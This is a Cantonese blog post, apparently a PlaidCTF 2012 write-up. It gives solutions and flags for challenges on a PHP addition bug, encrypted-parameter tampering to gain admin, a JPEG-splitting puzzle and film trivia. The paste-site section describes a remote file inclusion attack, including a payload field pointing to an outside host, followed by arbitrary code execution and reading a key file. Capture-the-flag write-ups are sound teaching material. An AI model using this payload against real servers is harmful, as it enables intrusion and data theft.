2012年5月4日 星期五

3P2012CTF

又黎 又要玩又要鬧
今次呢隻野扮晒 RPG 咁
結果最後都要屈服出返個 simple 介面。


今次好似好D答到四題。不過佢今次都幾多題目。

第一題
Addition is Hard
15
Puzzles
Addition is hard!
0x0 +0x7068703f = ?
Answer in decimal

今次一睇就知又翻炒 2011 果d Trivia 題。 上次果堆 "Past Paper": http://www.plaidctf.com/pctf2011/site_media/writeups/pCTF2011_Writeup_HFS.txt
你老味都唔係俾人睇既
咁一問 Google 1.3337 ~= XXXXXXX/3145727 就出 Pentium FDIV bug
今次實係加數 Bug 啦 咁又問下 Google 乜都冇。 (依家梗係有)

咁呢明眼人一睇就知 7068703f 就係 php? (好似係)
咁就問 Google php hex addition bug 出左下面果頁
https://bugs.php.net/bug.php?id=61095

原來加號黐住個數會變左乘二 都黐黐地線
答案: 3771785342


第二題

RoboDate
100
Password Guessing
So apparently robots, despite their lack of hormones, still have an underlying desire to mate. We stumbled upon a robot dating site, RoboDate. Hack it for us!

呢個無聊交友網可以俾人打個名同感情狀況 (果張 form 仲要隱藏左,又要開 Firebug)
Submit 出去又出返你個名同感情狀況。係咪好無聊呢
如果睇醬汁碼 會見到有個好抵死既 debug message



寫到咁白。咁呢個 query string 有一大抽 hex string,係咁意試下改其中一個 會搞到個 user_data d內容唔同左。拿 又翻炒 Padding Oracle。 上年炒到 2012 年中都仲 Padding Oracle。
嚴格黎講呢個唔算咩 Padding Oracle,因為你又唔會手痕改個 Padding 果d bytes,一改佢又彈句 Go away. 就算。 同埋個 Oracle 就唔係話聽日落唔落雨,係話聽日六合彩第一個字開幾號,改第二個就話第二個字開幾號。你玩晒啦。根本就算你唔知咩 IV XOR M' = M 呢d formula 你都可以慢慢試試到最後砌到個 |admin 出黎。

答案: 2012-04-25_14:46:24.29582+05:27@2012%127.0.0.2_IS_BEST_KEY



第三題

Paste
100
Practical Packets
Robot hackers, like their human counter parts, have a largely unmet need to dump large amounts of text to their peers. We recently got access to one of their servers and are providing you with the files. What have they been talking about?

今次俾埋 source code 你睇喎。 原來係 php 。README 寫住咩 PLEASE TURN allow_url_include ON。咁輪危險都開,肯定呢度出事啦。跟住搵搵下搵到 display_paste.php 有個乜春如果頭兩個字係 ^^ 就 require(substr($description, 2). ".txt"); 囉。咁你去 make_followup.php 果度又話你要有咩 admin cookie 先可以 post 個 description 有 ^^ 。咁呢唔知做乜我冇個 admin cookie 都照 post 到 ^^。 咁就順利 post 左個怪獸上去啦 ^^。 打呢段野打到我一堆 ^^。咁放左個 description 做我個網某個 file 之後咁我就可以任改任 run code 啦。第一時間諗掘個 mysql database。 點知乜都冇 (其實有一大堆其他參賽者既 post)。例子:


Array
(
    [0] => 4f9d6643584e0
    [id] => 4f9d6643584e0
    [1] => test
    [text] => test
    [2] => abap
    [language] => abap
    [3] => 4f9d6378af542
    [parent] => 4f9d6378af542
    [4] => ^^http://debugducky.com/test
    [description] => ^^http://debugducky.com/test
)

拿我仲上到佢個野架:
http://debugducky.com/test.txt



你見佢仲響到掘 information_schema 。
見唔到對就用下 dir 。點知有個野叫 key.php。你老味。
咁fread 佢就有答案。


答案: s0m3_php_d3v5_actua11y_d0_th15




第四題

3D
100
Potpourri
The robots appear to be testing some kind of new camera technology but we haven't quite figured it out yet. Understanding this imaging could be crucial to our understanding the enemy and winning the war.

呢題啊陸先生 (好似唔係姓陸喎佢。唔係話你 歐花)  都有份答 好似係。
俾左幅巨型 JPG File。乜春全息攝影。但係得一幅圖仲要有張野遮住個答案。
咁其實只要用個 jpg header 同 footer (FF D8 , FF D9) explode 下佢就會爆到好多幅圖。
咁啊陸先生佢話佢用人手拆(?) 拆到最後一幅出黎睇到答案 好似係
其實幅圖矇輪到丫。要睇幾幅先睇到答案

答案: 3d_g1v35_m3_a_h3adach3



有題怪野又答唔到 明明好似好易咁 (雖然都值百五分)
睇返人地D答案 又話要用 XOR 你老味又係 XOR 吊

其實就唔寫啦。玩到咁上下 題題都變左做 Reverse Engineering 咁。好似玩埃屍玩玩下題題都 Program 咁。


最後貼題 Gag 題

Shoulder Surfing
25
Puzzles
What's a password that polaroid head got from inside Ellingson?
答案

http://www.youtube.com/watch?v=eIAQFJhuNmU&t=4m44s

明眼人一睇就知 睇下你要睇幾多次啦喎

沒有留言:

張貼留言